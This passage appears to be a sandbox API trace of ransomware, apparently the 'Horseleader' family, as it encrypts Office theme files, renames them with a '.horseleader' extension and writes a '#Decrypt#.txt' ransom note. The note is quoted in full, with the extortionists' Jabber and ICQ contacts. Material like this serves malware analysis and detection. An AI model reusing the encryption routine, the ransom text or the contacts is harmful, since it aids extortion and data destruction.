(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF", lpSrch=".testttjffg") returned 0x0 [0246.641] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.641] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.642] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 81 [0246.642] StrStrW (lpFirst="DEEPBLUE.INF", lpSrch=".txt") returned 0x0 [0246.642] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=569) returned 1 [0246.642] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x239, lpOverlapped=0x0) returned 1 [0246.644] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdc7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x239, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x239, lpOverlapped=0x0) returned 1 [0246.644] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.644] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.645] CloseHandle (hObject=0x1a4) returned 1 [0246.645] GetProcessHeap () returned 0x780000 [0246.645] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.645] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF.horseleader") returned 93 [0246.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.inf.horseleader")) returned 1 [0246.691] GetProcessHeap () returned 0x780000 [0246.691] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.691] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xf75, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0246.691] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0246.691] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 80 [0246.691] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0246.691] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0246.691] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0246.691] lstrlenW (lpString=".testttjffg") returned 11 [0246.691] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.691] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.691] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF") returned 80 [0246.692] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.692] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=3957) returned 1 [0246.692] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0xf75, lpOverlapped=0x0) returned 1 [0246.717] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff08b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.717] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0xf75, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0xf75, lpOverlapped=0x0) returned 1 [0246.718] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.718] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.718] CloseHandle (hObject=0x1a4) returned 1 [0246.718] GetProcessHeap () returned 0x780000 [0246.718] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.718] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.horseleader") returned 92 [0246.718] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\preview.gif.horseleader")) returned 1 [0246.719] GetProcessHeap () returned 0x780000 [0246.719] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.719] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x81fd, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.719] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.719] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 81 [0246.719] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.720] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.720] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.720] lstrlenW (lpString=".testttjffg") returned 11 [0246.720] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.720] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.720] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.728] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 81 [0246.728] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.728] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=33277) returned 1 [0246.728] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.731] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.731] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.731] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x31fd, lpOverlapped=0x0) returned 1 [0246.732] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffce03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.732] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x31fd, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x31fd, lpOverlapped=0x0) returned 1 [0246.732] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.732] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.732] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.732] CloseHandle (hObject=0x1a4) returned 1 [0246.733] GetProcessHeap () returned 0x780000 [0246.733] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.733] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.horseleader") returned 93 [0246.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\thmbnail.png.horseleader")) returned 1 [0246.734] GetProcessHeap () returned 0x780000 [0246.734] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.734] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x81fd, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.734] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.734] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\#Decrypt#.txt") returned 82 [0246.734] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.734] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.735] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.736] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.736] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.736] CloseHandle (hObject=0x158) returned 1 [0246.736] GetProcessHeap () returned 0x780000 [0246.736] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.736] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ECHO", cAlternateFileName="")) returned 1 [0246.736] lstrcmpiW (lpString1="ECHO", lpString2="Windows") returned -1 [0246.736] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO") returned 64 [0246.736] lstrcmpW (lpString1="ECHO", lpString2=".") returned 1 [0246.736] lstrcmpW (lpString1="ECHO", lpString2="..") returned 1 [0246.736] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.736] GetProcessHeap () returned 0x780000 [0246.736] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.736] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*") returned 66 [0246.736] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.738] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.738] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\.") returned 66 [0246.738] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.738] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60891430, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.738] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.738] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\..") returned 67 [0246.738] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.738] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.738] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8a45100, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x60891430, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf8a45100, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0xb0ce, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="ECHO.ELM", cAlternateFileName="")) returned 1 [0246.738] lstrcmpiW (lpString1="ECHO.ELM", lpString2="Windows") returned -1 [0246.738] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 73 [0246.738] StrStrIW (lpFirst="ECHO.ELM", lpSrch=".horseleader") returned 0x0 [0246.739] lstrcmpW (lpString1="ECHO.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.739] lstrcmpW (lpString1="ECHO.ELM", lpString2="_uninstalling_.png") returned 1 [0246.739] lstrlenW (lpString=".testttjffg") returned 11 [0246.739] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM", lpSrch=".testttjffg") returned 0x0 [0246.739] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.739] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.739] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\echo.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.740] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\ECHO.ELM") returned 73 [0246.740] StrStrW (lpFirst="ECHO.ELM", lpSrch=".txt") returned 0x0 [0246.740] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=45262) returned 1 [0246.740] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.742] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.742] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.743] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, 